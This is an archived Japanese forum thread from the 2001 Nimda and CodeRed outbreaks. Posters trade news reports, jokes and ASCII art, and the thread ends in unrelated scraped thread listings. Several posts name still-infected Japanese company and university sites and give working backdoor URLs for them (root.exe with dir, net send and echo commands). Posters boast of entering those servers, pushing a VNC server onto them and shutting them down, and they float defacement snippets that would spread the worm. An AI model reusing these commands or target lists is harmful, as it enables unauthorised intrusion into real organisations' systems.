症状はどんな感じ?
挙げてこう。
(9/19)農水省にもウイルス侵入
(9/19)5国立大でウイルス感染
(9/19)三重県庁もウイルスに感染
(9/19)岐阜県でもウイルス感染
(9/19)宮城県庁もウイルス感染
(9/19)茨城県庁もウイルスに汚染
韓国の情報通信省は20日、
米連邦捜査局(FBI)が米中枢同時テロとの関連を調べている
新種のコンピューターウイルス「W32/Nimda」について
約3700件の被害報告があったことを明らかにした。
同省は「コードレッドなどに比べて感染力が強く、急速に広がっている」
と注意を呼びかけている。
〔ソウル20日共同〕
韓国でも被害あり!!
、_ ミ,,゚Д゚彡 < 正直、俺のPC。
uuuu´ \ _____________________________________________
一部サーバーと端末が19日午後、コンピューターウイルス「W32/Nimda(ニムダ)」に感染した。
この影響で汚染されたコンピューター端末が使えなくなったほか、
感染防止のため、内閣官房、内閣府から他のホームページを開かないよう指示した。
漏れ、会社PC無傷。
漏れ、淋しいから感染サイトでニムダ落す。色々眺めて遊ぶ。
そしたら、キャッシュした感染サイトのhtmlソース自体がウイルス反応。
苦笑い。
,: 三ニ三ミミ;、-、 \/  ̄ | --十 i 、.__/__ \ , ____|__l l ー十
xX'' `YY"゙ミ、 ∠=ー  ̄ヽ | __|. | | / ヽ / __| ,二i ̄
彡" ..______. ミ. (___ ノ. | (__i゙'' し ノ /^ヽ_ノ (__ (__
::::: ::;
,=ミ______=三ミ ji,=三ミi
i 、'ーーー|,-・ー |=|,ー・- | ,-v-、
i; ':: ::: ーー" ゙i ,ーー'j / _ノ_ノ:^)
ーi:: ::i: /`^ー゙`、_ ..i / _ノ_ノ_ノ /)
|:::. ゙"i _,,.-==-、;゙゙i / ノ ノノ//
〉::.:.. 丶 " ゙̄ .'.ノ ____ / ______ ノ
/ i, `ー-、.,____,___ノ\____(" `ー" 、 ノ
ー'/ 'i. ヽ、 ,二ニ/ \ ``ー-、 ゙ ノ
/ 'i、 /\ / > ( `ー''"ー'"
\ 'i," (__) / / \ /ノ
18日にリアルタイムでmsnが変だって言ってる時に
普通に見に行ったらられれたーよ。
20日出荷予定のパッケージシステム差分が出荷されず。
担当者曰く「ウィルスのせい」だそうです。
ウイルスに感染してもHPは正常に見れるよ。
http://www.rsk2000.co.jp
http://www.tokyo-toyopet.co.jp/comtop/index.html
http://www1.sphere.ne.jp/noone/
http://www.djnews.co.jp/
どうでもいいけど早く閉鎖しろよな(藁
よって晒し上げ
苦情はこちら↓
Sites with longest running systems at Dow Jones Japan K.K.
Dow Jones Japan K.K. Marunouchi Mitsui Bldg. 1F, 2-2-2 Marunouchi, Chiyoda-ku, Tokyo 100-0005, Japan
ダウ・ジョーンズ・ジャパン(株)
住所 東京都千代田区丸の内2−2−2
電話(代表)03-5220-2730
感染するとローカルマシンのhtmlファイルも改竄される模様。
どっかのページで地雷踏んで、それに気づかないままの可能性
あり。
ってことは改竄されたhtmlを転送したってこと?
にしても転送後に普通確認するよなぁ。
readme.exeも一緒に転送とか、故意以外に考え難いんだが
そんなことあるの?
BBS付き感染サイト
http://www.rsk2000.co.jp/ipg/
すま、俺もよくわかってないです
好奇心からいろいろ調べてるけど、伝染させるのに
使ってる脆弱性だけでも2,3あるし。
でも、ローカルのhtml,aspなど改竄するのは確かかと。
このへんから。
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
(ワーム自身の)コピーを行うフォルダにHTML、ASPファイルがあった
場合、HTMLファイルにJavaScriptのコマンドを一行追加すると同時に
“README.EML”のファイル名でウイルスのメールファイルを作成する
場合があります。このJavaScriptを追加されたHTML、ASPファイルが
Web上で公開されていた場合、そのページをブラウズすると
“README.EML”がオープンされ、IEのセキュリティホールにより
ウイルスが活動を開始します。
>nimudaウィルスは、サーバーが感染したものです。
>すでに駆除済みですが、コマンドが断片的に残されており
>ニムダを自動的にインストールしようとしてエラーが起こります。
>ウィルス自体は駆除済みなので感染することもございません。
>安心して閲覧して下さい。
だそうです。確かにhtmlには残骸が残っててダウンロードさせる
動作はするがreadme.exeが無いため404になってるようだが。
でも、起動ドライブには1つも無かった。
感染してるのか?
セキュリティのログ見て、ここんとこずっと一分おきくらいに一日中
アタックされてるからなんかむかついて1個アドレスコピーしてIPサーチ
のHPでそのアドレスに繋いだとたん、画面にでっかく「FUCK’IN USA GRAMEMT」
とか出てアンチウィルスの警告・・・処理画面の「次へ」のボタン押しつづけても新たな
警告のダイアログが・・・結局除去不可でウィルス隔離された後、手動でウィルス定義
更新して、完全スキャンして(ウィルスは発見されませんでした)その後メニュー画面で検疫
ログ見たら3つファイルがあったので削除。やっぱemlとかreadmeとなってた。
これでOKですよね?
つうか感染サイト行く時にはJavaのアクティブスクリプト
切りましょう。
http://www.soyo.co.jp/
>Javaのアクティブスクリプト
って何?
そういうボケ、おれ好きよ☆
アドバ・オプティカル・ネットワーキング株式会社
CodeRedにもやられたままだし。。。
注意しようにもDNSでMXが設定されてないし。。。。
社名にネットワーキングとはいってるが、何の会社だ。。。
http://www.xxx.xx.xx/readme.eml
って書いてあるでかいウィンドゥが開くんだよ。
1度駆除したが、再度罹患して全滅。
おととい駆除を終えたばかり。
今後2度と罹患しないでくれ〜。
なぜか拙者が容疑者だ。
光通信デバイスの商社です。
ネットワーキングといっても
コンピュータネットワークとはあまり関係ないんだね。
(関係あったらちょっとヤだったけど)
連休中だから会社に人がいなくて気づいてないのかな。。
何だろう。
メールはやらないということか。
なんだこりゃぁぁぁあぁぁああああああああああああああああああああああああ
ご愁傷様です(藁
バックドアの作成、admin.dll/riched20.dllの上書き、htmlファイルの改竄、
すべてのドライブのネットワーク共有の作成、開いているネットワーク共有フォルダへ
自分自身をコピー、ゲストアカウントの管理者権限への昇格、自前のSMTPエンジンを
使って自分自身を大量送信、実行形式ファイルの改竄
などなど。
その上CodeRedのroot.exe残ったままって結構あるな。
http://www.advaoptical.co.jp/scripts/root.exe?/c%20dir%20c:\
社名からネットワーキングはずした方がよくないか?
ttp://www.bee.woodland.co.jp/test/kb-index.htm
ここ↓は、やられてるのでしょうか?
ttp://www5.yodobashi.co.jp/jsp/dc.jsp?sst_id=0000000002
絶対、PL法違反だよ。分かってるバグを残して出荷してるんだから。
みんなで声を高らかに上げよう!
マイクロソフトはXPを無償で配ばれ!!
>マイクロソフトはXPを無償で配ばれ!!
穴だらけのものがこれ以上広がったらよけいマズイぞ!!
あると憶測してもいいと思われ。
というか、たとえ無くても、以後1年間は穴空けられまくると推測する方が
前向きで宜しいと思われ。
先ずは、リモートデスクトップ。
外からアクセスに強くても内側から起動させられて利用されればどうしよう
もないと思われ。
↓
トラフィクが急激に増大
↓
各プロバイダのバックボーン増強
↓
(゚д゚)ウマー
↓
,一-、
/ ̄ l | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
■■-っ < んなーこたーない
´∀`/ \________
__/|Y/\.
Ё|__ | / |
| У.. |
してるけど、なかなか捕まらないYO!
しかし、感染したことを隠す組織のなんと多いことか....
readme.emlへのアクセスだけを取り払っているので
バレバレだってばよ。
<language=JavaScript></JavaScript>
みたいな感じでばっちり残ってるんだけど....
port80のログをチェックして、nimdaからのアクセスがあれば
そこのroot.exeを覗きに行く、というのではどうかな。
数日前だけど、それでいくつか入手したよ。
いくらでもどうぞ。
ttp://www.sano-mfg.co.jp/tokucyo/tokuchou.htm
ttp://www.bee.woodland.co.jp
ttp://www.clubtgp.com/freehosting/teeny/kat/index.htm
redme.eml拾ってどうするの?
base64エンコードの部分だけxxxしてxxxxとxxxてxxxxなよ(w
そういえば、その方法使えたな....
どもです
>>58
ありがと、後で見に行ってみるよ。
>>59> redme.eml拾ってどうするの?
いや、ただ単に漏れが興味あるから見たくなっただけ。
ほら、それにこれだけ大騒ぎになってるのにほったらかしに
してある鯖ってちょっと見てみたくない?(w
>ほら、それにこれだけ大騒ぎになってるのにほったらかしに
>してある鯖ってちょっと見てみたくない?(w
つーか、ほったらかしのサイトってまえにあった
ttp://IP/script/root.exe?/c%20net%20send%20localhost%20%22ほげほげ%22
でメッセージ送ろうがお構いなしだよ。
そいやたまたまログに残ってたのを見にいったら、CodeRed.txtって
いうファイルを作ってる先客がいた。それでも気が付かないみたい。
ttp://IP/scripts/root.exe?/c%20echo%20Your Machine is infected by CodeRed.>c:\>CodeRed.txt
モニタ切ってるのかな?いいかげん飽きてきた。
ムダムダ。シャットダウンに成功したって翌日そのまま再起動してた例があるくらいだから。
そういえば、
あるサイトで見たんだが、
2001-09-20 04:03p 667,648 V3nimda.exe
このV3てなんだ?
http://IP/
で閉店してるのに
root.exe
が通るようなサイトは永久にこのままだな(w
実行したら http://IP/ が
ページを表示できません
だったのが、
ページが見つかりません
になっちゃったよ(w
V3はCodeRedIIのことかな?
ま、一応は対策しようとしてる姿勢はあるようだな。
バックドアには無頓着のようだが(w
>>61
再起動されたらしつこくシャットダウン(w
つか、2000でコマンドからシャットダウンってのは難しそう。
http://homepage2.nifty.com/winfaq/w2k/boot.html#1001
それもコマンドでファイル作って実行したのかな?
おらいま、VNCサーバー送り込もうとしてるだ(w
もう、何でもやってちょぷだい。
でもイターイのイヤーン。
つーか、こういうのがあるなら、感染マシンに取りこまさせたのでしょう。
漏れはやったわけじゃないけど。
それってどう?
んー、どこぞのftpでアップしろというのもanonymousじゃ
だめなわけだから結構難しいと思う。
感染鯖からftpでgetまでもできなさそう。
ftpまでハックしないと無理でない?
個人ユーザーが1台のマシンにつきっきりでもしんどいし、アタマ使うのに、会社で五月雨式にやっても永久に・・・。
某社ではIE禁止令(来年3月までの時限)が出たらしいよ。
http://www.takara-univ.ac.jp/
http://www.unionsys.co.jp/
http://nac-ltd.co.jp/
http://www.htsc.ap.titech.ac.jp
http://www.sg-jc.ac.jp/
http://www.advaoptical.co.jp/
http://www.computools.co.jp/
http://www.sano-mfg.co.jp
http://www1.fl.kansai-u.ac.jp/
http://www.inet-service.co.jp/
このへんが復活したらどうなるんだろう。 嵐が収まったから玄関あけよう、みたいなところも多いような・・。
こんなとこもあるし。
http://pc2.autechs-unet.ocn.ne.jp
10月再開って、なんか目途があるんだろうか。
http://www.with9.com/
EXPLOITツール使う。若し対象鯖未だパッチ当ててないなら使える。
外出配布済み。
取りあえず×
http://www.inet-service.co.jp/scripts/root.exe?/c%20dir%20c:\
http://cgibbs.mmjp.or.jp/bbs/show/www.zumensoft.co.jp/bbs
>これからの企業成長の原動力はダイナミックな情報システム。
>そのキーとなるのがイントラネットシステムです。
>国境や時差の壁を越え、世界中のあらゆる分野に浸透しつつあるインターネットを
>企業内のクライアント・サーバーシステムと融合させることにより
バックドアにより見事にイントラネットとインターネットが融合
しました(w
http://www.zumensoft.co.jp/menu.html
>>79
同じやん( ̄△ ̄;
>していくことを基本理念としています
バックドアによって社外から有用な情報が勝手にはいってくるわけですな。
だめぢゃん( ̄△ ̄;
>ウィルス駆除ソフトはシマンテックNorton Antivirus2000を使っていましたが効き目がありません
ノートンだめだとよ(w
匿名で投稿した2CHねら居たみたいだけど、IP晒されてる・・・。
晒されるのは最初から分かっているのだから承知の上だろう。
http://www.miruku.co.jp/usr/find/higa.htm
探してあげてください。
こ…このサイト、ひどすぎない?
ニムダのソース弄って、尋ね人のデータと連絡先本文にしてばら撒けば
良いよ。
index.htmlのソースに烈しくワラタ
<!-- sorosoro naosouyo... meiwakudayo... -->
89と思われ(w
”改竄できるなら、無害化しておいてやれ”
ってのはマズイんだよな。やっぱ
”改竄できるなら、index.htmlにも
<html><script language="JavaScript">window.open("V3nimda.exe",null, "resizable=no,top=6000,left=6000")</script></html>
を挿入しておいてやれ”
ってのもマズイんだよな。やっぱ
もっとひどいことになってるぞおい
だからやめなはれって(w
---
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META name="GENERATOR" content="IBM WebSphere Homepage Builder V6.0.2 for Windows">
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE>沖縄情報</TITLE>
</HEAD>
<FRAMESET rows="143,*" frameborder="NO">
<FRAME src="index_u.html" scrolling="AUTO">
<FRAMESET cols="125,*" frameborder="NO">
<FRAME src="index_l.html" scrolling="AUTO">
<FRAME src="index_d.html" scrolling="AUTO">
</FRAMESET>
<NOFRAMES>
<BODY>
<P>このページをご覧いただくにはフレーム対応のブラウザが必要です。</P>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
<!-- sorosoro naosouyo... meiwakudayo... -->
そこまでできるなら、NapかMXの鯖置いてくれ(w
<html><meta http-equiv="refresh" content="0.1;URL=http://www.R-jp.net/dh/02/"></html>
あ〜あ・・・こんなもんかね。ページクラクって(w
串さして遣ってないと不味い事にならんかね。。(w
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
ドクターアレック スアンチスパイウェア (202)
【オヒス】officeこと河合一穂専用スレ7【ハウス】 (859)
みんなのお気に入り優良セキュリティサイトを教えて (200)
常時接続のご時世、ルータはどれがいい? (643)
ID表示ってやばくない? (493)
プライスロトの不正プログラム復旧方法 (846)
--log9.info------------------
【イケハゲ】ハゲのファッション【カッコイイ】 (228)
ハゲスキンにして精神異常をきたした人のスレ (548)
【これがオレの】合わせ鏡2枚目【頭頂部?】 (813)
ハゲだけどギターやってる奴 (487)
【分け目禿げ】若年性雷型脱毛症【晴天の霹靂】 (442)
【販売停止】ザンドロックス Part13 (674)
AGA遺伝判定を受けたら書き込むスレ (439)
HUNTER×HUNTER風にハゲを語るスレ (522)
ハゲは会社で差別されますか? (574)
ISSAは植毛手術 完全に成功したっぽいな (245)
プラセンタ (295)
【植毛クリニックY美専門スレ】 (770)
指名手配犯の46歳の平田ですらドフサなのに・・・ (262)
年相応に禿げるのがこれからのトレンド (545)
店内で帽子をかぶりっぱなしの男はハゲ? (392)
鬱でも必死に会社に行っている人299 (703)
--log55.com------------------
松乃家 松のや とんかつ Part20
吉野家総合172
【かつ丼】かつや54杯目【とん汁】
青森秋田鳥取島根高知佐賀長崎大分宮崎:松屋進出不要2
☆名古屋でおいしいパン屋さん5☆
●この菓子パン美味しいから食べてみな●42個目
IDにpanが出るまで(´・ω・`)ショボーンするスレ118
【ドミノピザ】Domino's Pizza Part152